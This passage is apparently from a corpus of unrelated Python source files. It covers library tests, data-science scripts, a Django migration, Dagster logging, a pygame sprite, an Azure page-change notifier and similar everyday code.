with self.assertRaises((TypeError, AttributeError)):
del hooked.original
def test_implementation_cannot_be_deleted(self):
hooked = self._callFUT(not_called)
with self.assertRaises((TypeError, AttributeError)):
del hooked.implementation
def test_no_args(self):
with self.assertRaises(TypeError):
self._callFUT()
def test_too_many_args(self):
with self.assertRaises(TypeError):
self._callFUT(not_called, not_called)
def test_w_implementation_kwarg(self):
hooked = self._callFUT(implementation=return_foo)
self.assertIs(hooked.original, return_foo)
self.assertIs(hooked.implementation, return_foo)
self.assertEqual(hooked(), 'FOO')
def test_w_unknown_kwarg(self):
with self.assertRaises(TypeError):
self._callFUT(nonesuch=42)
def test_class(self):
class C:
pass
hooked = self._callFUT(C)
self.assertIsInstance(hooked(), C)
hooked.sethook(return_bar)
self.assertEqual(hooked(), 'BAR')
class TestIssue6Py(PyHookableMixin,
unittest.TestCase):
# Make sphinx docs for hooked objects work.
# https://github.com/zopefoundation/zope.hookable/issues/6
# We need to proxy __doc__ to the original,
# and synthesize an empty __bases__ and a __dict__ attribute
# if they're not present.
def _check_preserves_doc(self, docs):
self.assertEqual("I have some docs", docs.__doc__)
hooked = self._callFUT(docs)
self.assertEqual(hooked.__doc__, docs.__doc__)
def test_preserves_doc_function(self):
def docs():
"""I have some docs"""
self._check_preserves_doc(docs)
def test_preserves_doc_class(self):
class Docs:
"""I have some docs"""
self._check_preserves_doc(Docs)
def test_empty_bases_function(self):
hooked = self._callFUT(return_foo)
self.assertEqual((), hooked.__bases__)
def test_empty_dict_function(self):
hooked = self._callFUT(return_foo)
self.assertEqual({}, hooked.__dict__)
def test_bases_class(self):
class C:
pass
self.assertEqual(C.__bases__, (object,))
hooked = self._callFUT(C)
self.assertEqual(hooked.__bases__, (object,))
def test_dict_class(self):
class C:
pass
hooked = self._callFUT(C)
self.assertEqual(hooked.__dict__, C.__dict__)
def test_non_string_attr_name(self):
# Specifically for the C implementation, which has to deal with this
hooked = self._callFUT(return_foo)
with self.assertRaises(TypeError):
getattr(hooked, 42)
with self.assertRaises(TypeError):
hooked.__getattribute__(42)
def test_unicode_attribute_name(self):
# Specifically for the C implementation, which has to deal with this
hooked = self._callFUT(return_foo)
result = hooked.__getattribute__('__bases__')
self.assertEqual(result, ())
def test_short_name(self):
# Specifically for the C implementation, which has to deal with this
hooked = self._callFUT(return_foo)
with self.assertRaises(AttributeError):
hooked.__getattribute__('')
class HookableTests(HookableMixin, PyHookableTests):
pass
class TestIssue6(HookableMixin, TestIssue6Py):
pass
def test_suite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
|
7,908 | 84fb0e364ee3cd846148abfc9326f404f008c510 | # 내 풀이
with open("sequence.protein.2.fasta", "w") as fw:
with open("sequence.protein.fasta", "r") as fr:
for line in fr:
fw.write(line)
# 강사님 풀이
# fr = open('sequence.protein.fasta','r'):
# lines=fr.readlines()
# seq_list=list()
# for line in lines:
|
7,909 | 1292b894b75676abec3f97a8854fe406787baf1d | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 30 22:01:06 2016
@author: George
"""
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 24 23:22:16 2016
@author: George
"""
import os
import clr
import numpy as np
clr.AddReference(os.getcwd() + "\\libs\\MyMediaLite\\MyMediaLite.dll")
from MyMediaLite import IO, RatingPrediction, Eval
from MyMediaLite import Random
from tools import timing as tim
class Base():
def __init__(self):
Random.set_Seed(1)
def fit(self, DATASET, model_name, _):
data_path = ".\\data\\" + DATASET + "\\"
file_prefix = DATASET + "-f"
file_train_suffix1 = "-train.csv"
file_test_suffix = "-test.csv"
fold_rmse = []
fold_mae = []
fold_time = []
print self.rec.ToString()
for cv_index in range(0, 5):
train_data = IO.RatingData.Read(data_path + file_prefix + str(cv_index + 1) + file_train_suffix1)
test_data = IO.RatingData.Read(data_path + file_prefix + str(cv_index + 1) + file_test_suffix)
print data_path + file_prefix + str(cv_index + 1) + file_train_suffix1
self.rec.Ratings = train_data
tim.startlog('Training model')
self.rec.Train()
fold_time.append(tim.endlog('Done training model'))
score = Eval.Ratings.Evaluate(self.rec, test_data)
fold_rmse.append(score.get_Item("RMSE"))
fold_mae.append(score.get_Item("MAE"))
print model_name
print "Mean RMSE: %.5f +- %.5f" % (np.array(fold_rmse, dtype=np.single).mean(), np.array(fold_rmse, dtype=np.single).std())
print "Mean MAE: %.5f +- %.5f" % (np.array(fold_mae, dtype=np.single).mean(), np.array(fold_mae, dtype=np.single).std())
return fold_rmse, fold_mae, fold_time, 0, 0, 0
class GlobalAverage(Base):
def __init__(self):
Base.__init__(self)
self.rec = RatingPrediction.GlobalAverage()
class UserAverage(Base):
def __init__(self):
Base.__init__(self)
self.rec = RatingPrediction.UserAverage()
class ItemAverage(Base):
def __init__(self):
Base.__init__(self)
self.rec = RatingPrediction.ItemAverage()
|
7,910 | efa94f8442c9f43234d56a781d2412c9f7ab1bb3 | # -*- coding: utf-8 -*-
"""
Created on Fri Nov 15 10:39:55 2019
@author: PC
"""
import pandas as pd
dictionary={"Name":["Ali","Buse","Selma","Hakan","Bülent","Yağmur","Ahmet"],
"Age":[18,45,12,36,40,18,63],
"Maas":[100,200,400,500,740,963,123]}
dataFrame1=pd.DataFrame(dictionary) #excel gibi tablo oluşturur
head=dataFrame1.head() ##ilk 5 indisi verir
tail=dataFrame1.tail()
print(dataFrame1.columns)
print(dataFrame1.info())
print(dataFrame1.dtypes)
print(dataFrame1.describe()) |
7,911 | 196147d7b2b0cf7176b5baa50d7e7618f88df493 | import tensorflow as tf
import csv
from tensorflow.keras import layers
from tensorflow.keras.layers.experimental import preprocessing
import pandas as pd
import numpy as np
import random
import matplotlib.pyplot as plt
import math
def plot_loss(history):
plt.plot(history.history['loss'], label='loss')
plt.plot(history.history['val_loss'], label='val_loss')
plt.ylim([0, 10])
plt.xlabel('Epoch')
plt.ylabel('Error')
plt.legend()
plt.grid(True)
#get data
outputs=[]
inputs=[]
with open('C:\\Users\\owenb\\Desktop\\experiment results\\agent3_data\\actions.csv',newline='') as csvfile:
reader=csv.reader(csvfile,dialect='excel')
for x in reader:
outputs.append(x)
with open('C:\\Users\\owenb\\Desktop\\experiment results\\agent3_data\\messages_3_2.csv',newline='') as csvfile:
reader=csv.reader(csvfile,dialect='excel')
for x in reader:
inputs.append(x)
dataset=[[inputs[x],outputs[x]] for x in range(len(inputs))]
del dataset[8500:]
#process data
length=int(len(dataset)*0.8)
train_dataset=random.sample(dataset,length)
test_dataset=[y for y in dataset if y not in train_dataset]
train_features=[x[0] for x in train_dataset]
train_labels=[x[1] for x in train_dataset]
test_features=[x[0] for x in test_dataset]
test_labels=[x[1] for x in test_dataset]
for x in range(len(train_features)):
train_features[x]=np.array(np.expand_dims([float(y) for y in train_features[x]], axis=0))
train_labels[x]=np.array(np.expand_dims([float(y) for y in train_labels[x]], axis=0))
train_features=np.array(train_features)
train_labels=np.array(train_labels)
for x in range(len(test_features)):
test_features[x]=np.array(np.expand_dims([float(y) for y in test_features[x]], axis=0))
test_labels[x]=np.array(np.expand_dims([float(y) for y in test_labels[x]], axis=0))
test_features=np.array(test_features)
test_labels=np.array(test_labels)
#make model
#message=tf.keras.Input(shape=(1,100))
#predictor_layer=tf.keras.layers.Dense(6,activation='relu',use_bias=True)(message)
#linear_model=tf.keras.Model(inputs=message,outputs=predictor_layer)
normalizer=preprocessing.Normalization(input_shape=(1, 100))
normalizer.adapt(train_features)
linear_model=tf.keras.Sequential([normalizer,tf.keras.layers.Dense(6)])
linear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),loss='mean_absolute_error')
#train model
history = linear_model.fit(x=train_features, y=train_labels, epochs=100,verbose=0,validation_split = 0.2)
plot_loss(history)
#test model
test_results = linear_model.evaluate(test_features, test_labels, verbose=1)
print("agent 3-2 post train error="+str(test_results))
linear_model.save('agent3-2.h5')
|
7,912 | c01ea897cd64b3910531babe9fce8c61b750185d | import os
path = r'D:\python\风变编程\python基础-山顶班\fb_16'
path1 = 'test_01'
path2 = 'fb_csv-01-获取网页内容.py'
print(os.getcwd()) # 返回当前工作目录
print(os.listdir(path)) # 返回path指定的文件夹包含的文件或文件夹的名字的列表
#print(os.mkdir(path1)) # 创建文件夹
print(os.path.abspath(path)) # 返回绝对路径
print(os.path.basename(path)) # 返回文件名
print(os.path.isfile(path2)) # 判断路径是否为文件
print(os.path.isdir(path1)) # 判断路径是否为目录 |
7,913 | 65752c8ac50205df0fea105123935110e4a30aba | from math import pi
width = float(input("Enter the width of the tire in mm (ex 205): "))
aspectRatio = float(input("Enter the aspect ratio of the tire (ex 60): "))
diameter = float(input("Enter the diameter of the wheel in inches (ex 15): "))
approxVolume = (pi * (width ** 2) * aspectRatio * ((width * aspectRatio) + (2540 * diameter)))/10000000000
print(f"The apporximate volume is {approxVolume:.2f} liters") |
7,914 | c589ce4ba2ae60d14787a8939146f6140fff1f01 | import pygame
import random
from pygame.locals import *
import pygame
from pygame.locals import *
class GameObject(pygame.sprite.Sprite):
SIZE = 8
def __init__(self, x, y, surface):
super(GameObject, self).__init__()
self.x = x
self.y = y
self.surface = surface
def getDistance(self, other):
return abs(self.x-other.x) + abs(self.y - other.y)
def collide(self, main, other):
pass
import gameobject
class Food(gameobject.GameObject):
def __init__(self, x, y, surface, time = random.randint(0, 50)):
super(Food, self).__init__(x,y,surface)
self.dead = False
self.SIZE = gameobject.GameObject.SIZE
self.image = pygame.Surface((2*self.SIZE, 2*self.SIZE),
flags = SRCALPHA)
self.image.convert()
self.rect = pygame.draw.circle(self.image,
pygame.Color("blue"),
(self.SIZE,self.SIZE), self.SIZE/2+2)
self.rect.midtop = (x,y)
def update(self):
pass
# self.rect.midtop = (self.x, self.y)
def collide(self, main, other):
if not other == self and not self.dead:
self.dead = True
|
7,915 | fe406f40b48bf4982e7a48737b6b30514ae1fa71 | #Checks if all declared prefixes are used in the RDF File
import glob
import logging
import sys
import Utility as utility
import re
# set log level
logging.basicConfig(level=logging.INFO)
root_path = "../"
rdf_file_extension = {".ttl":"turtle", ".nt":"nt", ".rdf":"application/rdf+xml"}
regex_prefix = {".ttl": r'@prefix(.*?)\n', ".rdf": r'xmlns:(.*?)\n'}
regex_url = {".ttl": r'\<(.*?)\>', ".rdf": r'\"(.*?)\"'}
regex_splitter = {".ttl": ":", ".nt":"nt", ".rdf":"="}
for extension in rdf_file_extension.keys() :
files_to_check = "**/*" + extension
for filename in glob.iglob(root_path + files_to_check, recursive=True):
logging.info("Validating file " + filename)
try:
#Parse file using rdflib
g = utility.parseGraph(filename, rdf_file_extension[extension])
#Read File
content = utility.readFile(filename)
#Get Declared prefixes
declared_prefixes = utility.getDeclaredPrefixesRegex(content, regex_prefix[extension], regex_url[extension], regex_splitter[extension])
#Check redundant declaration
duplicated_prefixes = utility.findDuplicates(declared_prefixes)
#If redundant, raise exception
if len(duplicated_prefixes) > 0:
msg = utility.getErrorMessage(duplicated_prefixes)
raise Exception("Duplicated prefix declaration: {}".format(msg))
if(extension == '.ttl'):
#Remove prefixes from content
content = re.sub(r'@prefix(.*?)\n', '', content)
#Check for prefix usage
unused_prefixes = utility.getUnusedPrefixesRegex(declared_prefixes, content)
elif(extension == '.rdf'):
#Check for prefix usage
used_prefixes = utility.getUsedPrefixesRDF(g)
unused_prefixes = utility.getUnusedPrefixesRDF(declared_prefixes, used_prefixes)
#If there are unused prefixes, raise exception
if len(unused_prefixes) > 0:
msg = utility.getErrorMessage(unused_prefixes)
raise Exception("Unused prefixes:\n {}".format(msg))
except Exception as e:
logging.error(e)
logging.error("Syntaxic error reading turtle file [" +filename+"]")
sys.exit(1)
print("Files syntaxic validation is successful") |
7,916 | 98dac1ea372f16ecdb818fbe3287ab7e51a0d67c | from sqlalchemy import literal, Column, String, Integer, ForeignKey
from sqlalchemy.orm import relationship
from common.db import Base
class Airplane(Base):
__tablename__ = 'airplanes'
id = Column(Integer, primary_key=True)
icao_code = Column(String(6), unique=True, nullable=False) # ICAO 24-bit identifier
airline_id = Column(Integer, ForeignKey('airlines.id'))
airline = relationship('Airline', backref='airplanes')
manufacturer = Column(String)
model = Column(String)
def __init__(self, icao_code, airline, manufacturer=None, model=None):
self.icao_code = icao_code
self.airline = airline
self.manufacturer = manufacturer
self.model = model
def __repr__(self):
return 'Airplane({icao_code}, {airline})'.format(
icao_code=self.icao_code,
airline=self.airline)
@staticmethod
def exists_airplane(session, icao_code):
q = session.query(Airplane).filter(Airplane.icao_code == icao_code)
return session.query(literal(True)).filter(q.exists()).scalar()
@staticmethod
def airplane_from_icao_code(session, icao_code):
return session.query(Airplane).filter(Airplane.icao_code == icao_code).first()
|
7,917 | 0df20722fba6223c9d4fc9f72bfb399b479db6ac | o = input()
v = []
s = 0
for i in range(12):
col = []
for j in range(12):
col.append(float(input()))
v.append(col)
a = 1
for i in range(1, 12):
for j in range(a):
s += v[i][j]
a+=1
if o == 'S':
print("%.1f"%s)
if o == 'M':
print("%.1f"%(s/66))
|
7,918 | dd96b7f73c07bf0c74e6ce4dbff1a9cc09729b72 | from hicity.graphics.graphics import HiCityGUI
def GUI():
app = HiCityGUI()
app.mainloop()
if __name__ == '__main__':
GUI()
|
7,919 | ead843f1edcfe798613effb049e3ca79dcd03b71 | # Generated by Django 3.2.4 on 2021-07-18 02:05
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('tracker', '0003_auto_20210626_0735'),
]
operations = [
migrations.CreateModel(
name='Result',
fields=[
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_date', models.DateTimeField(auto_now_add=True, db_index=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, db_index=True)),
('value', models.TextField(max_length=2000)),
('tracker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tracker.tracker')),
],
options={
'abstract': False,
},
),
]
|
7,920 | ee8bf681adcb07c4f79245c8f118131bbcabd2fa | num1 = input("첫 번째 실수 : ")
num2 = input("두 번째 실수 : ")
print(float(num1) + float(num2))
num1 = float(input("첫 번째 실수 : "))
num2 = float(input("두 번째 실수 : "))
print(num1 + num2)
|
7,921 | 786bc5d44115b46bd246e85e85c8f8c1f20737b9 | """config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf import settings
from django.urls import include, path
from rest_framework import routers
from BugBytes import views
from django.conf.urls.static import static
router = routers.DefaultRouter()
router.register(r'species', views.SpeciesViewSet)
router.register(r'com_names', views.Com_NamesViewSet)
router.register(r'photos', views.PhotosViewSet)
urlpatterns = [
path('admin/', admin.site.urls),
path('api/', include(router.urls)),
path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
path('bugbytes/<int:tensorflow_id>/view_species',
views.view_species, name='view_species'),
path('', views.landing, name='landing'),
path('model_json/', views.model_json, name='model_json'),
]
if settings.DEBUG: # new
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
7,922 | f900e08c06ae736f5e32ac748e282700f9d0a969 | import datetime
import logging
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional
from dagster import check
from dagster.core.utils import coerce_valid_log_level, make_new_run_id
if TYPE_CHECKING:
from dagster.core.events import DagsterEvent
DAGSTER_META_KEY = "dagster_meta"
class DagsterMessageProps(
NamedTuple(
"_DagsterMessageProps",
[
("orig_message", Optional[str]),
("log_message_id", Optional[str]),
("log_timestamp", Optional[str]),
("dagster_event", Optional[Any]),
],
)
):
"""Internal class used to represent specific attributes about a logged message"""
def __new__(
cls,
orig_message: str,
log_message_id: Optional[str] = None,
log_timestamp: Optional[str] = None,
dagster_event: Optional["DagsterEvent"] = None,
):
return super().__new__(
cls,
orig_message=check.str_param(orig_message, "orig_message"),
log_message_id=check.opt_str_param(
log_message_id, "log_message_id", default=make_new_run_id()
),
log_timestamp=check.opt_str_param(
log_timestamp, "log_timestamp", default=datetime.datetime.utcnow().isoformat()
),
dagster_event=dagster_event,
)
@property
def error_str(self) -> Optional[str]:
if self.dagster_event is None:
return None
event_specific_data = self.dagster_event.event_specific_data
if not event_specific_data:
return None
error = getattr(event_specific_data, "error", None)
if error:
return "\n\n" + getattr(event_specific_data, "error_display_string", error.to_string())
return None
@property
def pid(self) -> Optional[str]:
if self.dagster_event is None or self.dagster_event.pid is None:
return None
return str(self.dagster_event.pid)
@property
def step_key(self) -> Optional[str]:
if self.dagster_event is None:
return None
return self.dagster_event.step_key
@property
def event_type_value(self) -> Optional[str]:
if self.dagster_event is None:
return None
return self.dagster_event.event_type_value
class DagsterLoggingMetadata(
NamedTuple(
"_DagsterLoggingMetadata",
[
("run_id", Optional[str]),
("pipeline_name", Optional[str]),
("pipeline_tags", Dict[str, str]),
("step_key", Optional[str]),
("solid_name", Optional[str]),
("resource_name", Optional[str]),
("resource_fn_name", Optional[str]),
],
)
):
"""Internal class used to represent the context in which a given message was logged (i.e. the
step, pipeline run, resource, etc.)
"""
def __new__(
cls,
run_id: str = None,
pipeline_name: str = None,
pipeline_tags: Dict[str, str] = None,
step_key: str = None,
solid_name: str = None,
resource_name: str = None,
resource_fn_name: str = None,
):
return super().__new__(
cls,
run_id=run_id,
pipeline_name=pipeline_name,
pipeline_tags=pipeline_tags or {},
step_key=step_key,
solid_name=solid_name,
resource_name=resource_name,
resource_fn_name=resource_fn_name,
)
@property
def log_source(self):
if self.resource_name is None:
return self.pipeline_name or "system"
return f"resource:{self.resource_name}"
def to_tags(self) -> Dict[str, str]:
# converts all values into strings
return {k: str(v) for k, v in self._asdict().items()}
def construct_log_string(
logging_metadata: DagsterLoggingMetadata, message_props: DagsterMessageProps
) -> str:
return (
" - ".join(
filter(
None,
(
logging_metadata.log_source,
logging_metadata.run_id,
message_props.pid,
logging_metadata.step_key,
message_props.event_type_value,
message_props.orig_message,
),
)
)
+ (message_props.error_str or "")
)
class DagsterLogManager(logging.Logger):
def __init__(
self,
logging_metadata: DagsterLoggingMetadata,
loggers: List[logging.Logger],
handlers: Optional[List[logging.Handler]] = None,
):
self._logging_metadata = check.inst_param(
logging_metadata, "logging_metadata", DagsterLoggingMetadata
)
self._loggers = check.list_param(loggers, "loggers", of_type=logging.Logger)
super().__init__(name="dagster", level=logging.DEBUG)
handlers = check.opt_list_param(handlers, "handlers", of_type=logging.Handler)
for handler in handlers:
self.addHandler(handler)
@property
def logging_metadata(self) -> DagsterLoggingMetadata:
return self._logging_metadata
@property
def loggers(self) -> List[logging.Logger]:
return self._loggers
def log_dagster_event(self, level: int, msg: str, dagster_event: "DagsterEvent"):
self.log(level=level, msg=msg, extra={DAGSTER_META_KEY: dagster_event})
def log(self, level, msg, *args, **kwargs):
# allow for string level names
super().log(coerce_valid_log_level(level), msg, *args, **kwargs)
def _log(
self, level, msg, args, exc_info=None, extra=None, stack_info=False
): # pylint: disable=arguments-differ
# we stash dagster meta information in the extra field
extra = extra or {}
dagster_message_props = DagsterMessageProps(
orig_message=msg, dagster_event=extra.get(DAGSTER_META_KEY)
)
# convert the message to our preferred format
msg = construct_log_string(self.logging_metadata, dagster_message_props)
# combine all dagster meta information into a single dictionary
meta_dict = {
**self.logging_metadata._asdict(),
**dagster_message_props._asdict(),
}
# step-level events can be logged from a pipeline context. for these cases, pull the step
# key from the underlying DagsterEvent
if meta_dict["step_key"] is None:
meta_dict["step_key"] = dagster_message_props.step_key
extra[DAGSTER_META_KEY] = meta_dict
for logger in self._loggers:
logger.log(level, msg, *args, extra=extra)
super()._log(level, msg, args, exc_info=exc_info, extra=extra, stack_info=stack_info)
def with_tags(self, **new_tags):
"""Add new tags in "new_tags" to the set of tags attached to this log manager instance, and
return a new DagsterLogManager with the merged set of tags.
Args:
tags (Dict[str,str]): Dictionary of tags
Returns:
DagsterLogManager: a new DagsterLogManager namedtuple with updated tags for the same
run ID and loggers.
"""
return DagsterLogManager(
logging_metadata=self.logging_metadata._replace(**new_tags),
loggers=self._loggers,
handlers=self.handlers,
)
|
7,923 | a9b895e4d0830320276359944ca6fdc475fd144e | """
函数对象有一个__defaults__属性,是保存定位参数和关键字参数默认值的元组,
仅限关键字参数默认值在__kwdefaults__属性中,参数的名称在__code__属性中(__code__本身是对象引用,有很多属性)
使用inspect模块提取函数签名更加方便,很多框架和IDE都是以此来验证代码的
"""
def tag(name, *content, cls=None, **attrs):
""" 生成一个或多个HTML标签 """
if cls is not None:
attrs['class'] = cls
if attrs:
attrs_str = ''.join(' %s="%s"' % (attr, value) for attr, value in attrs.items())
else:
attrs_str = ''
if content:
return '\n'.join('<%s%s>%s</%s>' % (name, attrs_str, c, name) for c in content)
else:
return '<%s%s />' % (name, attrs_str)
print(
tag.__defaults__,
tag.__code__,
tag.__code__.co_varnames,
tag.__code__.co_argcount,
sep = '\n'
)
print()
from inspect import signature
sig = signature(tag)
print(sig)
for name, param in sig.parameters.items(): # name 和 param.name是一样的
print(param.kind, ':', name, '=', param.default)
print()
# signature函数返回的是inspect.Signature对象,它的parameters属性是一个有序映射,这里即sig.parameters,
# 是inspect.Parameter对象,它有name、default、kind,还有annotation属性
# inspect.Signature对象有一个bind方法,可以把任意个参数绑定到签名的形参上
my_tag = {
'name': 'img',
'title': 'Sunset',
'src': 'sunset.jpg',
'cls': 'framed'
}
bound_args = sig.bind(**my_tag)
print(bound_args)
for name, value in bound_args.arguments.items(): # 一个OrderedDict对象
print(name, '=', value)
|
7,924 | 670a23aa910a6709735281b7e64e5254a19277c6 | import datetime
import logging
import os
import requests
from bs4 import BeautifulSoup
import telebot
from azure.storage.blob import BlobClient
import hashlib
import azure.functions as func
def hash_string(input_string: str) -> str:
return hashlib.sha256(input_string.encode("utf-8")).hexdigest()
def main(mytimer: func.TimerRequest) -> None:
utc_timestamp = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Python timer trigger function ran at %s', utc_timestamp)
url = os.environ['TargetUrl']
search_term = os.environ['SearchTerm']
reqs = requests.get(url)
soup = BeautifulSoup(reqs.text, 'html.parser')
token = telebot.TeleBot(os.environ['TelebotToken'])
chat_id = os.environ['TelebotChatId']
urls = []
for link in soup.find_all('a'):
link_url = link.get('href')
# Add only links that contain the search term
if search_term in link_url:
urls.append(link_url)
logging.info(f"Looking for: {search_term}")
logging.info(f"Urls conatining the pattern: {urls}")
lst_to_str = ';'.join([str(i) for i in urls])
new_hash = hash_string(lst_to_str)
now = datetime.datetime.now()
file_suffix = now.strftime("%Y%m%d%I%M%S")
year = now.year
month = now.month
day = now.day
blob = BlobClient.from_connection_string(
conn_str=os.environ['AzureWebJobsStorage'], container_name="hashstore", blob_name=f'urls/{year}/{month}/{day}/html-{file_suffix}.html')
blob.upload_blob(lst_to_str, blob_type='BlockBlob')
logging.info(new_hash)
blob = BlobClient.from_connection_string(
conn_str=os.environ['AzureWebJobsStorage'], container_name="hashstore", blob_name='hash.tmp')
blob_hash = ''
if blob.exists():
blob_hash = str(blob.download_blob().readall())
if blob_hash != new_hash:
message = f'Hash of this page: {url} has changed'
bot = telebot.TeleBot(token)
bot.config['api_key'] = token
bot.send_message(chat_id, message)
blob.delete_blob()
blob.upload_blob(new_hash, blob_type='BlockBlob')
logging.info(f'Old hash >>>> {blob_hash}')
logging.info(f'New hash >>>> {new_hash}')
|
7,925 | d514413c303dd174d8f56685158780a1681e1aba | # -*- coding: utf-8 -*-
"""
Created on Sat Nov 2 08:04:11 2019
@author: yocoy
"""
import serial, time
arduino = serial.Serial('COM7', 9600)
time.sleep(4)
lectura = []
for i in range(100):
lectura.append(arduino.readline())
arduino.close()
print(lectura) |
7,926 | f9d1013fa278b9078e603b012abbdde0be2e0962 | def del_ops3(str1, str2):
# find all common letters in both strings
common1 = [x for x in str1 if x in str2]
common2 = [x for x in str2 if x in str1]
if len(common2) < len(common1):
common1, common2 = common2, common1
# find total of strings with 0, 1, or 2 characters, (2 chars - only if c1 != c2)
if len(common1) == 0 or len(common2) == 0:
total = len(str1) + len(str2)
elif (len(common1) == 1 or len(common2) == 1) or (len(common1) == 2 and len(common2) == 2 and common1 != common2):
total = (len(str1) - 1) + (len(str2) - 1)
# else, if 2 characters in c1, c2 and c1 != c2 or > 2 characters in c1, c2
else:
# create references to c2 indexes of each letter in c1
refs = defaultdict(list)
for i, letter in enumerate(common2):
refs[letter].append(i)
# find all letters that follow each other (same order) in both strings
substring = [] # substring == all common letters in same sequence in both strings
previous = min(refs[common1[0]])
for i, letter in enumerate(common1):
# if any c2 index of the current letter in c1 is > the c2 index of previous letter:
# the current letter follows the previous letter in both c1 and c2
if any([i > previous for i in refs[letter]]) and all([i != previous for i in refs[letter]]):
# if the same letter at the same index is not already in substring:
if all([hash(x) != hash(common2[previous]) for x in substring]):
substring.append(common2[previous])
substring.append(letter)
previous = min([x for x in refs[letter] if x >= previous])
# next iteration of previous is always == the smallest index
# of the current letter that is >= current iteration of previous
# (always > previous if not first iteration in c1)
# indexes are never repeated or skipped
# elif the letter does not follow the same letter in both strings:
# previous = smallest c2 index of letter that broke sequence/did not follow in both strings
elif all(refs[letter]) < previous:
previous = min([x for x in refs[letter]])
print(i, previous, letter, substring)
# total == total of all letters - (number of letters in substring * 2)
total = (len(str1) - len(substring)) + (len(str2) - len(substring))
return "".join(substring)
|
7,927 | f819d1b1f2f6f3052247cda592007eac40aca37a | #!/usr/bin/env python3
# -*- coding: ascii -*-
"""
A script removing animations from SVG graphics.
"""
import sys, os, re
# etree fails utterly at producing nice-looking XML
from xml.dom import minidom
def process(inpt, outp):
def traverse(node):
for child in node.childNodes:
if child.nodeType != minidom.Node.ELEMENT_NODE:
continue
elif child.tagName in ('animate', 'animateTransform'):
node.removeChild(child)
elif child.tagName in ('style', 'script'):
if child.getAttribute('key') == 'animation':
node.removeChild(child)
else:
traverse(child)
node.normalize()
if len(node.childNodes) == 0: return
for child in (node.childNodes[0], node.childNodes[-1]):
if child.nodeType != minidom.Node.TEXT_NODE:
continue
if not child.data.isspace() or child.data.count('\n') <= 1:
continue
if len(node.childNodes) == 1:
node.removeChild(child)
return
child.data = re.sub(r'\n.*\n', r'\n', child.data)
document = minidom.parse(inpt)
traverse(document.documentElement)
outp.write('<?xml version="1.0" encoding="utf-8"?>\n')
document.documentElement.writexml(outp)
outp.write('\n')
def main():
if len(sys.argv) != 3:
sys.stderr.write('USAGE: %s input output\n' % sys.argv[0])
sys.stderr.flush()
sys.exit(0)
with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:
process(inpt, outp)
if __name__ == '__main__': main()
|
7,928 | 86a15bb2e4d59fb5c8763fa2de31164beb327685 | import re
from xml.etree import ElementTree
def get_namespace(xml_path):
with open(xml_path) as f:
namespaces = re.findall(r"xmlns:(.*?)=\"(.*?)\"", f.read())
return dict(namespaces)
def get_comic_data(item, ns):
return {
"title": item.find("title").text,
"post_date": item.find("pubDate").text,
"path": "",
"guid": item.find("guid").text,
"alt_text": "",
"tags": [child.text for child in item.findall("category")],
"text": item.find("content:encoded", ns).text,
}
def get_comics(xml_path):
ns = get_namespace(xml_path)
tree = ElementTree.parse(xml_path)
root = tree.getroot()
assert root.tag == "rss"
channel = root[0]
assert channel.tag == "channel"
version = channel.find("wp:wxr_version", ns).text
assert version == "1.2"
return [get_comic_data(item, ns) for item in channel.findall("item")]
|
7,929 | f7e2fc7b5420b90f733a9520b75555bd869cea98 | class TreeNode(object):
"""
Implementation of a TreeNode
A TreeNode is a Node with a value and a list of children. Each child is also
a TreeNode
Class invariants:
- self.value: The value for this TreeNode : Any
- self.children: The list of children for this Node : TreeNode List
"""
def __init__(self, value, parent = None):
"""
Initializes a TreeNode
Parameter value: the value for this TreeNode
Class invariants:
- self.value: The value for this TreeNode : Any
- self.children: The list of children for this Node : TreeNode List
"""
self.value = value
self.children = []
self.parent = parent
def add_child(self, value):
"""
Adds a value to the list of children for this node
Parameter value: the value to add to the Tree
Precondition: value is not a TreeNode
"""
assert type(value) != TreeNode
self.children.append(TreeNode(value, self))
def height(self):
"""
The height of the Tree
This function recursively computes the height of the tree from the root.
It computes the height of each child and returns the maximum height
Returns: the height of the tree (int)
"""
if self.children == []:
return 1
else:
arr = []
for child in self.children:
result = 1 + child.height()
arr.append(result)
return max(arr)
def get_children(self):
"""
Returns: the children for this tree (TreeNode List)
"""
return self.children
def get_value(self):
"""
Returns: the value for this TreeNode
"""
return self.value |
7,930 | 61a58b934c6663e87824e4f9f9ffd92c3236947c | from django.db import models
class Link(models.Model):
text = models.CharField(max_length=100)
link = models.URLField()
def __str__(self):
return self.text
|
7,931 | bcb028bd25732e17ed1478e122ac3b2d1abf2520 | from __future__ import division
from pyoperators import pcg
from pysimulators import profile
from qubic import (
create_random_pointings, equ2gal, QubicAcquisition, PlanckAcquisition,
QubicPlanckAcquisition, QubicInstrument)
from qubic.data import PATH
from qubic.io import read_map
import healpy as hp
import matplotlib.pyplot as mp
import numpy as np
def statstr(vec):
m=np.mean(vec)
s=np.std(vec)
return '{0:.4f} +/- {1:.4f}'.format(m,s)
def plotinst(inst,shift=0.12):
for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):
if quad < 4:
plot(xyc[0],xyc[1],'ro')
else:
plot(xyc[0]+shift,xyc[1],'bo')
xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):
out = []
for i, (kind, lim) in enumerate(zip('IQU', Trange)):
map = input[..., i]
